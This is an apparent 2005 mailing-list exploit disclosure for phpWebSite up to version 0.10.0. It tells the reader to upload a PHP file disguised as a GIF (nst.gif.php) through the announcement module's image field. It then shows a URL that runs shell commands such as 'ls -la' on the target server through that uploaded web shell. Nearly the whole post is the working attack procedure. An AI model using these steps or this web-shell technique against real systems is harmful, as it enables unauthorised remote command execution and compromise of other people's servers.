<<< Date Index >>>     <<< Thread Index >>>

phpWebSite-0.10.0_exploit



phpWebSite-0.10.0_exploit

Attachment: nst.gif.php
Description: Binary data

oooo...oooo.oooooooo8.ooooooooooo 
.8888o..88.888........88..888..88 
.88.888o88..888oooooo.....888     
.88...8888.........888....888     
o88o....88.o88oooo888....o888o    
********************************
**** Network security team *****
********* nst.e-nex.com ********
********************************
* Title: phpWebSite <= v0.10.0
* Bug found by: nst
* Date: 24.02.2005
********************************

Web: phpwebsite.appstate.edu

http://target/index.php?module=announce&ANN_user_op=submit_announcement&MMN_position=3:3

1. Fill all inputs
2. in Image: select nst.gif.php

press Save.

Go here http://target/images/announce/nst.gif.php?nst=ls -la